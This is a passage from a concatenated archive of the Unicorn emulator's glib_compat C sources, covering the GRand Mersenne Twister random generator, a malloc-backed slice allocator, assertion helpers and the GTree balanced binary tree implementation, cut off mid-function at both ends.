(rand->mti=1; rand->mti<N; rand->mti++) rand->mt[rand->mti] = (69069 * rand->mt[rand->mti-1]); break; case 22: /* See Knuth TAOCP Vol2. 3rd Ed. P.106 for multiplier. */ /* In the previous version (see above), MSBs of the */ /* seed affect only MSBs of the array mt[]. */ rand->mt[0]= seed; for (rand->mti=1; rand->mti<N; rand->mti++) rand->mt[rand->mti] = 1812433253UL * (rand->mt[rand->mti-1] ^ (rand->mt[rand->mti-1] >> 30)) + rand->mti; break; default: // g_assert_not_reached (); break; } } /** * g_rand_new_with_seed: * @seed: a value to initialize the random number generator * * Creates a new random number generator initialized with @seed. * * Returns: the new #GRand **/ GRand* g_rand_new_with_seed (guint32 seed) { GRand *rand = g_new0 (GRand, 1); g_rand_set_seed (rand, seed); return rand; } /** * g_rand_set_seed_array: * @rand_: a #GRand * @seed: array to initialize with * @seed_length: length of array * * Initializes the random number generator by an array of longs. * Array can be of arbitrary size, though only the first 624 values * are taken. This function is useful if you have many low entropy * seeds, or if you require more then 32 bits of actual entropy for * your application. * * Since: 2.4 */ void g_rand_set_seed_array (GRand *rand, const guint32 *seed, guint seed_length) { guint i, j, k; g_return_if_fail (rand != NULL); g_return_if_fail (seed_length >= 1); g_rand_set_seed (rand, 19650218UL); i=1; j=0; k = (N>seed_length ? 
N : seed_length); for (; k; k--) { rand->mt[i] = (rand->mt[i] ^ ((rand->mt[i-1] ^ (rand->mt[i-1] >> 30)) * 1664525UL)) + seed[j] + j; /* non linear */ rand->mt[i] &= 0xffffffffUL; /* for WORDSIZE > 32 machines */ i++; j++; if (i>=N) { rand->mt[0] = rand->mt[N-1]; i=1; } if (j>=seed_length) j=0; } for (k=N-1; k; k--) { rand->mt[i] = (rand->mt[i] ^ ((rand->mt[i-1] ^ (rand->mt[i-1] >> 30)) * 1566083941UL)) - i; /* non linear */ rand->mt[i] &= 0xffffffffUL; /* for WORDSIZE > 32 machines */ i++; if (i>=N) { rand->mt[0] = rand->mt[N-1]; i=1; } } rand->mt[0] = 0x80000000UL; /* MSB is 1; assuring non-zero initial array */ } /** * g_rand_new_with_seed_array: * @seed: an array of seeds to initialize the random number generator * @seed_length: an array of seeds to initialize the random number * generator * * Creates a new random number generator initialized with @seed. * * Returns: the new #GRand * * Since: 2.4 */ GRand *g_rand_new_with_seed_array (const guint32 *seed, guint seed_length) { GRand *rand = g_new0 (GRand, 1); g_rand_set_seed_array (rand, seed, seed_length); return rand; } gint64 g_get_real_time (void) { #if defined(unix) || defined(__unix__) || defined(__unix) || defined (__MINGW32__) || defined(__APPLE__) || defined(__HAIKU__) struct timeval r; /* this is required on alpha, there the timeval structs are ints * not longs and a cast only would fail horribly */ gettimeofday (&r, NULL); return (((gint64) r.tv_sec) * 1000000) + r.tv_usec; #else FILETIME ft; guint64 time64; GetSystemTimeAsFileTime (&ft); memmove (&time64, &ft, sizeof (FILETIME)); /* Convert from 100s of nanoseconds since 1601-01-01 * to Unix epoch. This is Y2038 safe. */ time64 -= G_GINT64_CONSTANT (116444736000000000); time64 /= 10; return time64; #endif } /** * g_rand_new: * * Creates a new random number generator initialized with a seed taken * either from `/dev/urandom` (if existing) or from the current time * (as a fallback). * * On Windows, the seed is taken from rand_s(). * * Returns: the new #GRand */ GRand *g_rand_new (void) { guint32 seed[4]; #if defined(unix) || defined(__unix__) || defined(__unix) || defined(__APPLE__) || defined(__HAIKU__) static gboolean dev_urandom_exists = TRUE; if (dev_urandom_exists) { FILE* dev_urandom; do { dev_urandom = fopen("/dev/urandom", "rb"); } while (dev_urandom == NULL && errno == EINTR); if (dev_urandom) { int r; setvbuf (dev_urandom, NULL, _IONBF, 0); do { errno = 0; r = fread (seed, sizeof (seed), 1, dev_urandom); } while (errno == EINTR); if (r != 1) dev_urandom_exists = FALSE; fclose (dev_urandom); } else dev_urandom_exists = FALSE; } if (!dev_urandom_exists) { gint64 now_us = g_get_real_time (); seed[0] = now_us / G_USEC_PER_SEC; seed[1] = now_us % G_USEC_PER_SEC; seed[2] = getpid (); seed[3] = getppid (); } #else /* G_OS_WIN32 */ /* rand_s() is only available since Visual Studio 2005 and * MinGW-w64 has a wrapper that will emulate rand_s() if it's not in msvcrt */ #if (defined(_MSC_VER) && _MSC_VER >= 1400) || defined(__MINGW64_VERSION_MAJOR) gint i; for (i = 0; i < 4;/* array size of seed */ i++) { rand_s(&seed[i]); } #else #warning Using insecure seed for random number generation because of missing rand_s() in Windows XP GTimeVal now; g_get_current_time (&now); seed[0] = now.tv_sec; seed[1] = now.tv_usec; seed[2] = getpid (); seed[3] = 0; #endif #endif return g_rand_new_with_seed_array (seed, 4); } /** * g_rand_int: * @rand_: a #GRand * * Returns the next random #guint32 from @rand_ equally distributed over * the range [0..2^32-1]. 
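 *
 * A minimal usage sketch (hypothetical caller code, not part of this
 * file): seed a generator deterministically, then draw values from it.
 * Note that this stripped-down port only declares the constructors and
 * g_rand_int() in grand.h; there is no g_rand_free() here.
 * |[<!-- language="C" -->
 * GRand *rand = g_rand_new_with_seed (42);
 * guint32 a = g_rand_int (rand);
 * guint32 b = g_rand_int (rand);
 * ]|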
 *
 * Returns: a random number
 */
guint32 g_rand_int (GRand *rand)
{
    guint32 y;
    static const guint32 mag01[2] = {0x0, MATRIX_A};
    /* mag01[x] = x * MATRIX_A for x=0,1 */

    g_return_val_if_fail (rand != NULL, 0);

    if (rand->mti >= N) { /* generate N words at one time */
        int kk;

        for (kk = 0; kk < N - M; kk++) {
            y = (rand->mt[kk] & UPPER_MASK) | (rand->mt[kk+1] & LOWER_MASK);
            rand->mt[kk] = rand->mt[kk+M] ^ (y >> 1) ^ mag01[y & 0x1];
        }
        for (; kk < N - 1; kk++) {
            y = (rand->mt[kk] & UPPER_MASK) | (rand->mt[kk+1] & LOWER_MASK);
            rand->mt[kk] = rand->mt[kk+(M-N)] ^ (y >> 1) ^ mag01[y & 0x1];
        }
        y = (rand->mt[N-1] & UPPER_MASK) | (rand->mt[0] & LOWER_MASK);
        rand->mt[N-1] = rand->mt[M-1] ^ (y >> 1) ^ mag01[y & 0x1];

        rand->mti = 0;
    }

    y = rand->mt[rand->mti++];
    y ^= TEMPERING_SHIFT_U(y);
    y ^= TEMPERING_SHIFT_S(y) & TEMPERING_MASK_B;
    y ^= TEMPERING_SHIFT_T(y) & TEMPERING_MASK_C;
    y ^= TEMPERING_SHIFT_L(y);

    return y;
}
unicorn-2.1.1/glib_compat/grand.h
/* GLIB - Library of useful routines for C programming
 * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

/*
 * Modified by the GLib Team and others 1997-2000. See the AUTHORS
 * file for a list of people on the GLib Team. See the ChangeLog
 * files for a list of changes. These files are distributed with
 * GLib at ftp://ftp.gtk.org/pub/gtk/.
*/ #ifndef __G_RAND_H__ #define __G_RAND_H__ #include "gtypes.h" typedef struct _GRand GRand; GRand *g_rand_new_with_seed(guint32 seed); GRand *g_rand_new_with_seed_array (const guint32 *seed, guint seed_length); GRand *g_rand_new(void); guint32 g_rand_int(GRand *rand_); #endif /* __G_RAND_H__ */ �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gslice.c������������������������������������������������������������������0000664�0000000�0000000�00000005514�14675241067�0017103�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB sliced memory - fast concurrent memory chunk allocator * Copyright (C) 2005 Tim Janik * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* MT safe */ #include <string.h> #include "gtypes.h" #include "gslice.h" #include "gmem.h" /* gslice.h */ /** * g_slice_alloc: * @block_size: the number of bytes to allocate * * Allocates a block of memory from the slice allocator. * The block address handed out can be expected to be aligned * to at least 1 * sizeof (void*), * though in general slices are 2 * sizeof (void*) bytes aligned, * if a malloc() fallback implementation is used instead, * the alignment may be reduced in a libc dependent fashion. * Note that the underlying slice allocation mechanism can * be changed with the [`G_SLICE=always-malloc`][G_SLICE] * environment variable. * * Returns: a pointer to the allocated memory block, which will be %NULL if and * only if @mem_size is 0 * * Since: 2.10 */ gpointer g_slice_alloc (gsize mem_size) { return g_malloc (mem_size); } /** * g_slice_alloc0: * @block_size: the number of bytes to allocate * * Allocates a block of memory via g_slice_alloc() and initializes * the returned memory to 0. Note that the underlying slice allocation * mechanism can be changed with the [`G_SLICE=always-malloc`][G_SLICE] * environment variable. * * Returns: a pointer to the allocated block, which will be %NULL if and only * if @mem_size is 0 * * Since: 2.10 */ gpointer g_slice_alloc0 (gsize mem_size) { gpointer mem = g_slice_alloc (mem_size); if (mem) memset (mem, 0, mem_size); return mem; } /** * g_slice_free1: * @block_size: the size of the block * @mem_block: a pointer to the block to free * * Frees a block of memory. * * The memory must have been allocated via g_slice_alloc() or * g_slice_alloc0() and the @block_size has to match the size * specified upon allocation. 
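 *
 * A minimal pairing sketch (hypothetical caller code): the type-based
 * macros from gslice.h derive the size from the type, which keeps the
 * allocation and release sizes consistent automatically.
 * |[<!-- language="C" -->
 * typedef struct { int x, y; } Point;
 * Point *p = g_slice_new0 (Point);
 * p->x = 3;
 * g_slice_free (Point, p);
 * ]|
 *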
Note that the exact release behaviour * can be changed with the [`G_DEBUG=gc-friendly`][G_DEBUG] environment * variable, also see [`G_SLICE`][G_SLICE] for related debugging options. * * If @mem_block is %NULL, this function does nothing. * * Since: 2.10 */ void g_slice_free1 (gsize mem_size, gpointer mem_block) { g_free (mem_block); } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gslice.h������������������������������������������������������������������0000664�0000000�0000000�00000002607�14675241067�0017110�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB sliced memory - fast threaded memory chunk allocator * Copyright (C) 2005 Tim Janik * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef __G_SLICE_H__ #define __G_SLICE_H__ #include "gtypes.h" #define g_slice_new(type) ((type*) g_slice_alloc (sizeof (type))) #define g_slice_new0(type) ((type*) g_slice_alloc0 (sizeof (type))) gpointer g_slice_alloc0 (gsize block_size); gpointer g_slice_alloc (gsize block_size); void g_slice_free1 (gsize block_size, gpointer mem_block); #define g_slice_free(type, mem) \ G_STMT_START { \ if (1) g_slice_free1 (sizeof (type), (mem)); \ else (void) ((type*) 0 == (mem)); \ } G_STMT_END #endif /* __G_SLICE_H__ */ �������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gtestutils.c��������������������������������������������������������������0000664�0000000�0000000�00000002165�14675241067�0020043�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLib testing utilities * Copyright (C) 2007 Imendio AB * Authors: Tim Janik, Sven Herzberg * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. 
* * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "gtestutils.h" #include <stdlib.h> #include <stdio.h> void g_assertion_message_expr (const char *file, int line, const char *expr) { if (!expr) printf("%s:%d code should not be reached", file, line); else printf("%s:%d assertion failed: %s", file, line, expr); abort(); } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gtestutils.h��������������������������������������������������������������0000664�0000000�0000000�00000004211�14675241067�0020042�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLib testing utilities * Copyright (C) 2007 Imendio AB * Authors: Tim Janik * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef __G_TEST_UTILS_H__ #define __G_TEST_UTILS_H__ #if !(defined (G_STMT_START) && defined (G_STMT_END)) #define G_STMT_START do #if defined (_MSC_VER) && (_MSC_VER >= 1500) #define G_STMT_END \ __pragma(warning(push)) \ __pragma(warning(disable:4127)) \ while(0) \ __pragma(warning(pop)) #else #define G_STMT_END while (0) #endif #endif #if __GNUC__ > 2 || (__GNUC__ == 2 && __GNUC_MINOR__ > 4) #define G_GNUC_NORETURN \ __attribute__((__noreturn__)) #else /* !__GNUC__ */ /* NOTE: MSVC has __declspec(noreturn) but unlike GCC __attribute__, * __declspec can only be placed at the start of the function prototype * and not at the end, so we can't use it without breaking API. 
*/ #define G_GNUC_NORETURN #endif /* !__GNUC__ */ void g_assertion_message_expr (const char *file, int line, const char *expr) G_GNUC_NORETURN; #define g_assert_not_reached() G_STMT_START { g_assertion_message_expr (__FILE__, __LINE__, NULL); } G_STMT_END #define g_assert(expr) G_STMT_START { \ if (expr) ; else \ g_assertion_message_expr (__FILE__, __LINE__, #expr); \ } G_STMT_END #endif /* __G_TEST_UTILS_H__ */ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gtree.c�������������������������������������������������������������������0000664�0000000�0000000�00000077560�14675241067�0016755�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ /* * MT safe */ #include "gtypes.h" #include "gtree.h" //#include "gatomic.h" //#include "gtestutils.h" #include "gslice.h" #include "gmessages.h" #include "gnode.h" /** * SECTION:trees-binary * @title: Balanced Binary Trees * @short_description: a sorted collection of key/value pairs optimized * for searching and traversing in order * * The #GTree structure and its associated functions provide a sorted * collection of key/value pairs optimized for searching and traversing * in order. * * To create a new #GTree use g_tree_new(). * * To insert a key/value pair into a #GTree use g_tree_insert(). * * To look up the value corresponding to a given key, use * g_tree_lookup() and g_tree_lookup_extended(). * * To find out the number of nodes in a #GTree, use g_tree_nnodes(). To * get the height of a #GTree, use g_tree_height(). * * To traverse a #GTree, calling a function for each node visited in * the traversal, use g_tree_foreach(). * * To remove a key/value pair use g_tree_remove(). * * To destroy a #GTree, use g_tree_destroy(). 
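 *
 * A minimal end-to-end sketch (hypothetical caller code; assumes
 * <string.h> for strcmp(), and the string literals used as keys and
 * values are illustrative only):
 * |[<!-- language="C" -->
 * static gint compare_keys (gconstpointer a, gconstpointer b)
 * {
 *     return strcmp ((const gchar *) a, (const gchar *) b);
 * }
 *
 * GTree *tree = g_tree_new (compare_keys);
 * g_tree_insert (tree, "one", "1");
 * gchar *value = g_tree_lookup (tree, "one");
 * g_tree_destroy (tree);
 * ]|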
**/ #undef G_TREE_DEBUG #define MAX_GTREE_HEIGHT 40 typedef struct _GTreeNode GTreeNode; /** * GTree: * * The GTree struct is an opaque data structure representing a * [balanced binary tree][glib-Balanced-Binary-Trees]. It should be * accessed only by using the following functions. */ struct _GTree { GTreeNode *root; GCompareDataFunc key_compare; GDestroyNotify key_destroy_func; GDestroyNotify value_destroy_func; gpointer key_compare_data; guint nnodes; gint ref_count; }; struct _GTreeNode { gpointer key; /* key for this node */ gpointer value; /* value stored at this node */ GTreeNode *left; /* left subtree */ GTreeNode *right; /* right subtree */ gint8 balance; /* height (right) - height (left) */ guint8 left_child; guint8 right_child; }; static GTreeNode* g_tree_node_new (gpointer key, gpointer value); static void g_tree_insert_internal (GTree *tree, gpointer key, gpointer value, gboolean replace); static gboolean g_tree_remove_internal (GTree *tree, gconstpointer key, gboolean steal); static GTreeNode* g_tree_node_balance (GTreeNode *node); static GTreeNode *g_tree_find_node (GTree *tree, gconstpointer key); static gint g_tree_node_pre_order (GTreeNode *node, GTraverseFunc traverse_func, gpointer data); static gint g_tree_node_in_order (GTreeNode *node, GTraverseFunc traverse_func, gpointer data); static gint g_tree_node_post_order (GTreeNode *node, GTraverseFunc traverse_func, gpointer data); static gpointer g_tree_node_search (GTreeNode *node, GCompareFunc search_func, gconstpointer data); static GTreeNode* g_tree_node_rotate_left (GTreeNode *node); static GTreeNode* g_tree_node_rotate_right (GTreeNode *node); #ifdef G_TREE_DEBUG static void g_tree_node_check (GTreeNode *node); #endif static GTreeNode *g_tree_node_new (gpointer key, gpointer value) { GTreeNode *node = g_slice_new (GTreeNode); node->balance = 0; node->left = NULL; node->right = NULL; node->left_child = FALSE; node->right_child = FALSE; node->key = key; node->value = value; return node; } /** * g_tree_new: * @key_compare_func: the function used to order the nodes in the #GTree. * It should return values similar to the standard strcmp() function - * 0 if the two arguments are equal, a negative value if the first argument * comes before the second, or a positive value if the first argument comes * after the second. * * Creates a new #GTree. * * Returns: a newly allocated #GTree */ GTree *g_tree_new (GCompareFunc key_compare_func) { g_return_val_if_fail (key_compare_func != NULL, NULL); return g_tree_new_full ((GCompareDataFunc) key_compare_func, NULL, NULL, NULL); } /** * g_tree_new_with_data: * @key_compare_func: qsort()-style comparison function * @key_compare_data: data to pass to comparison function * * Creates a new #GTree with a comparison function that accepts user data. * See g_tree_new() for more details. 
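 *
 * A minimal comparator sketch (hypothetical caller code) showing how
 * @key_compare_data reaches the comparison function on every call:
 * |[<!-- language="C" -->
 * static gint compare_ints (gconstpointer a, gconstpointer b,
 *                           gpointer user_data)
 * {
 *     gboolean descending = (user_data != NULL);
 *     gint diff = *(const gint *) a - *(const gint *) b;
 *     return descending ? -diff : diff;
 * }
 *
 * GTree *tree = g_tree_new_with_data (compare_ints, NULL);
 * ]|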
* * Returns: a newly allocated #GTree */ GTree *g_tree_new_with_data (GCompareDataFunc key_compare_func, gpointer key_compare_data) { g_return_val_if_fail (key_compare_func != NULL, NULL); return g_tree_new_full (key_compare_func, key_compare_data, NULL, NULL); } /** * g_tree_new_full: * @key_compare_func: qsort()-style comparison function * @key_compare_data: data to pass to comparison function * @key_destroy_func: a function to free the memory allocated for the key * used when removing the entry from the #GTree or %NULL if you don't * want to supply such a function * @value_destroy_func: a function to free the memory allocated for the * value used when removing the entry from the #GTree or %NULL if you * don't want to supply such a function * * Creates a new #GTree like g_tree_new() and allows to specify functions * to free the memory allocated for the key and value that get called when * removing the entry from the #GTree. * * Returns: a newly allocated #GTree */ GTree *g_tree_new_full (GCompareDataFunc key_compare_func, gpointer key_compare_data, GDestroyNotify key_destroy_func, GDestroyNotify value_destroy_func) { GTree *tree; g_return_val_if_fail (key_compare_func != NULL, NULL); tree = g_slice_new (GTree); tree->root = NULL; tree->key_compare = key_compare_func; tree->key_destroy_func = key_destroy_func; tree->value_destroy_func = value_destroy_func; tree->key_compare_data = key_compare_data; tree->nnodes = 0; tree->ref_count = 1; return tree; } static inline GTreeNode *g_tree_first_node (GTree *tree) { GTreeNode *tmp; if (!tree->root) return NULL; tmp = tree->root; while (tmp->left_child) tmp = tmp->left; return tmp; } static inline GTreeNode *g_tree_node_previous (GTreeNode *node) { GTreeNode *tmp; tmp = node->left; if (node->left_child) while (tmp->right_child) tmp = tmp->right; return tmp; } static inline GTreeNode *g_tree_node_next (GTreeNode *node) { GTreeNode *tmp; tmp = node->right; if (node->right_child) while (tmp->left_child) tmp = tmp->left; return tmp; } void g_tree_remove_all (GTree *tree) { GTreeNode *node; GTreeNode *next; g_return_if_fail (tree != NULL); node = g_tree_first_node (tree); while (node) { next = g_tree_node_next (node); if (tree->key_destroy_func) tree->key_destroy_func (node->key); if (tree->value_destroy_func) tree->value_destroy_func (node->value); g_slice_free (GTreeNode, node); node = next; } tree->root = NULL; tree->nnodes = 0; } /** * g_tree_ref: * @tree: a #GTree * * Increments the reference count of @tree by one. * * It is safe to call this function from any thread. * * Returns: the passed in #GTree * * Since: 2.22 */ GTree *g_tree_ref (GTree *tree) { g_return_val_if_fail (tree != NULL, NULL); tree->ref_count++; return tree; } /** * g_tree_unref: * @tree: a #GTree * * Decrements the reference count of @tree by one. * If the reference count drops to 0, all keys and values will * be destroyed (if destroy functions were specified) and all * memory allocated by @tree will be released. * * It is safe to call this function from any thread. * * Since: 2.22 */ void g_tree_unref (GTree *tree) { g_return_if_fail (tree != NULL); tree->ref_count--; if (!tree->ref_count) { g_tree_remove_all (tree); g_slice_free (GTree, tree); } } /** * g_tree_destroy: * @tree: a #GTree * * Removes all keys and values from the #GTree and decreases its * reference count by one. If keys and/or values are dynamically * allocated, you should either free them first or create the #GTree * using g_tree_new_full(). 
In the latter case the destroy functions * you supplied will be called on all keys and values before destroying * the #GTree. */ void g_tree_destroy (GTree *tree) { g_return_if_fail (tree != NULL); g_tree_remove_all (tree); g_tree_unref (tree); } /** * g_tree_insert: * @tree: a #GTree * @key: the key to insert * @value: the value corresponding to the key * * Inserts a key/value pair into a #GTree. * * If the given key already exists in the #GTree its corresponding value * is set to the new value. If you supplied a @value_destroy_func when * creating the #GTree, the old value is freed using that function. If * you supplied a @key_destroy_func when creating the #GTree, the passed * key is freed using that function. * * The tree is automatically 'balanced' as new key/value pairs are added, * so that the distance from the root to every leaf is as small as possible. */ void g_tree_insert (GTree *tree, gpointer key, gpointer value) { g_return_if_fail (tree != NULL); g_tree_insert_internal (tree, key, value, FALSE); #ifdef G_TREE_DEBUG g_tree_node_check (tree->root); #endif } /** * g_tree_replace: * @tree: a #GTree * @key: the key to insert * @value: the value corresponding to the key * * Inserts a new key and value into a #GTree similar to g_tree_insert(). * The difference is that if the key already exists in the #GTree, it gets * replaced by the new key. If you supplied a @value_destroy_func when * creating the #GTree, the old value is freed using that function. If you * supplied a @key_destroy_func when creating the #GTree, the old key is * freed using that function. * * The tree is automatically 'balanced' as new key/value pairs are added, * so that the distance from the root to every leaf is as small as possible. */ void g_tree_replace (GTree *tree, gpointer key, gpointer value) { g_return_if_fail (tree != NULL); g_tree_insert_internal (tree, key, value, TRUE); #ifdef G_TREE_DEBUG g_tree_node_check (tree->root); #endif } /* internal insert routine */ static void g_tree_insert_internal (GTree *tree, gpointer key, gpointer value, gboolean replace) { GTreeNode *node; GTreeNode *path[MAX_GTREE_HEIGHT]; int idx; g_return_if_fail (tree != NULL); if (!tree->root) { tree->root = g_tree_node_new (key, value); tree->nnodes++; return; } idx = 0; path[idx++] = NULL; node = tree->root; while (1) { int cmp = tree->key_compare (key, node->key, tree->key_compare_data); if (cmp == 0) { if (tree->value_destroy_func) tree->value_destroy_func (node->value); node->value = value; if (replace) { if (tree->key_destroy_func) tree->key_destroy_func (node->key); node->key = key; } else { /* free the passed key */ if (tree->key_destroy_func) tree->key_destroy_func (key); } return; } else if (cmp < 0) { if (node->left_child) { path[idx++] = node; node = node->left; } else { GTreeNode *child = g_tree_node_new (key, value); child->left = node->left; child->right = node; node->left = child; node->left_child = TRUE; node->balance -= 1; tree->nnodes++; break; } } else { if (node->right_child) { path[idx++] = node; node = node->right; } else { GTreeNode *child = g_tree_node_new (key, value); child->right = node->right; child->left = node; node->right = child; node->right_child = TRUE; node->balance += 1; tree->nnodes++; break; } } } /* Restore balance. This is the goodness of a non-recursive * implementation, when we are done with balancing we 'break' * the loop and we are done. 
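 *
 * Concretely (an illustrative summary, not extra code): path[] holds
 * every ancestor visited on the way down. We pop ancestors one by one,
 * adjusting each balance by +/-1 depending on which subtree grew. A
 * node whose balance leaves [-1, 1] is fixed with a rotation; once an
 * ancestor's balance settles back to 0, the height of its subtree is
 * unchanged, nothing above it can be affected, and the loop breaks.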
*/ while (1) { GTreeNode *bparent = path[--idx]; gboolean left_node = (bparent && node == bparent->left); //g_assert (!bparent || bparent->left == node || bparent->right == node); if (node->balance < -1 || node->balance > 1) { node = g_tree_node_balance (node); if (bparent == NULL) tree->root = node; else if (left_node) bparent->left = node; else bparent->right = node; } if (node->balance == 0 || bparent == NULL) break; if (left_node) bparent->balance -= 1; else bparent->balance += 1; node = bparent; } } /** * g_tree_remove: * @tree: a #GTree * @key: the key to remove * * Removes a key/value pair from a #GTree. * * If the #GTree was created using g_tree_new_full(), the key and value * are freed using the supplied destroy functions, otherwise you have to * make sure that any dynamically allocated values are freed yourself. * If the key does not exist in the #GTree, the function does nothing. * * Returns: %TRUE if the key was found (prior to 2.8, this function * returned nothing) */ gboolean g_tree_remove (GTree *tree, gconstpointer key) { gboolean removed; g_return_val_if_fail (tree != NULL, FALSE); removed = g_tree_remove_internal (tree, key, FALSE); #ifdef G_TREE_DEBUG g_tree_node_check (tree->root); #endif return removed; } /** * g_tree_steal: * @tree: a #GTree * @key: the key to remove * * Removes a key and its associated value from a #GTree without calling * the key and value destroy functions. * * If the key does not exist in the #GTree, the function does nothing. * * Returns: %TRUE if the key was found (prior to 2.8, this function * returned nothing) */ gboolean g_tree_steal (GTree *tree, gconstpointer key) { gboolean removed; g_return_val_if_fail (tree != NULL, FALSE); removed = g_tree_remove_internal (tree, key, TRUE); #ifdef G_TREE_DEBUG g_tree_node_check (tree->root); #endif return removed; } /* internal remove routine */ static gboolean g_tree_remove_internal (GTree *tree, gconstpointer key, gboolean steal) { GTreeNode *node, *parent, *balance; GTreeNode *path[MAX_GTREE_HEIGHT]; int idx; gboolean left_node; g_return_val_if_fail (tree != NULL, FALSE); if (!tree->root) return FALSE; idx = 0; path[idx++] = NULL; node = tree->root; while (1) { int cmp = tree->key_compare (key, node->key, tree->key_compare_data); if (cmp == 0) break; else if (cmp < 0) { if (!node->left_child) return FALSE; path[idx++] = node; node = node->left; } else { if (!node->right_child) return FALSE; path[idx++] = node; node = node->right; } } /* The following code is almost equal to g_tree_remove_node, * except that we do not have to call g_tree_node_parent. 
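 *
 * The cases handled below (an illustrative summary): a node with no
 * children is unlinked from its parent; a node with one child is
 * replaced by that child; a node with two children is replaced by its
 * in-order successor, which is first spliced out of its own position.
 * In each case the threaded left/right pointers of the neighbouring
 * nodes are repaired, then the balance factors along path[] are fixed.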
*/ balance = parent = path[--idx]; //g_assert (!parent || parent->left == node || parent->right == node); left_node = (parent && node == parent->left); if (!node->left_child) { if (!node->right_child) { if (!parent) tree->root = NULL; else if (left_node) { parent->left_child = FALSE; parent->left = node->left; parent->balance += 1; } else { parent->right_child = FALSE; parent->right = node->right; parent->balance -= 1; } } else /* node has a right child */ { GTreeNode *tmp = g_tree_node_next (node); tmp->left = node->left; if (!parent) tree->root = node->right; else if (left_node) { parent->left = node->right; parent->balance += 1; } else { parent->right = node->right; parent->balance -= 1; } } } else /* node has a left child */ { if (!node->right_child) { GTreeNode *tmp = g_tree_node_previous (node); tmp->right = node->right; if (parent == NULL) tree->root = node->left; else if (left_node) { parent->left = node->left; parent->balance += 1; } else { parent->right = node->left; parent->balance -= 1; } } else /* node has a both children (pant, pant!) */ { GTreeNode *prev = node->left; GTreeNode *next = node->right; GTreeNode *nextp = node; int old_idx = idx + 1; idx++; /* path[idx] == parent */ /* find the immediately next node (and its parent) */ while (next->left_child) { path[++idx] = nextp = next; next = next->left; } path[old_idx] = next; balance = path[idx]; /* remove 'next' from the tree */ if (nextp != node) { if (next->right_child) nextp->left = next->right; else nextp->left_child = FALSE; nextp->balance += 1; next->right_child = TRUE; next->right = node->right; } else node->balance -= 1; /* set the prev to point to the right place */ while (prev->right_child) prev = prev->right; prev->right = next; /* prepare 'next' to replace 'node' */ next->left_child = TRUE; next->left = node->left; next->balance = node->balance; if (!parent) tree->root = next; else if (left_node) 